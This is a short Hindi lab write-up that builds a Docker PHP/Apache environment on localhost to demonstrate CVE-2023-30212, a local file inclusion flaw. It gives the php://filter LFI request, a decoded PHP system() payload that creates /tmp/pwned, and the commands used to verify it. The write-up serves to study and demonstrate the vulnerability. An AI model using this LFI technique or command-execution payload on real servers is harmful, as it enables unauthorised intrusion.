
Docker का उपयोग करके CVE-2023-30212 के लिए PoC
Docker का उपयोग करके CVE-2023-30212 के लिए PoC
यह रिपोर्ट Vulhub में उपलब्ध नहीं होने वाली CVE-2023-30212 कमज़ोरी के लिए Docker-आधारित कमज़ोर वेब पर्यावरण को स्वयं स्थापित करने और PoC के माध्यम से उस कमज़ोरी को सिद्ध करने का विवरण प्रस्तुत करती है।
php:8.1-apache/var/www/html निर्देशिका में vulnerable.php और malicious.php कॉपी करें8088 पर बाहरी पहुँच संभव
| फ़ाइल नाम | विवरण |
|---|---|
vulnerable.php | LFI कमज़ोरी वाली PHP फ़ाइल |
malicious.php | सिस्टम कमांड निष्पादित करने वाली दुर्भावनापूर्ण PHP फ़ाइल |
docker-compose.yml | कंटेनर सेटअप के लिए कॉन्फ़िगरेशन फ़ाइल |
Dockerfile | डॉकर इमेज बनाने के लिए कॉन्फ़िगरेशन फ़ाइल |
---
docker-compose up -d
कंटेनर का नाम: cve-2023-30212-cve-lfi-1
Apache सर्वर चालू होता है तथा http://localhost:8088 पर पहुँच संभव है
http://localhost:8088/vulnerable.php?file=php://filter/convert.base64-encode/resource=malicious.php
आउटपुट को डिकोड करने पर नीचे दिया गया PHP कोड दिखाई देता है:
<?php system("touch /tmp/pwned"); ?>
http://localhost:8088/malicious.php
कमांड निष्पादित करने के बाद, /tmp/pwned फ़ाइल बन जानी चाहिए।
docker exec -it cve-2023-30212-cve-lfi-1 ls /tmp
यदि परिणाम में pwned फ़ाइल मौजूद है, तो सफलता।
php://filter-आधारित LFI कमज़ोरी के माध्यम से दुर्भावनापूर्ण फ़ाइल की सामग्री की पुष्टि और डिकोडिंग सफल रही
system() फ़ंक्शन युक्त दुर्भावनापूर्ण PHP कॉल के माध्यम से मनमाने कमांड निष्पादित करने में सफलता
/tmp/pwned फ़ाइल बनने के साथ PoC सत्यापन पूर्ण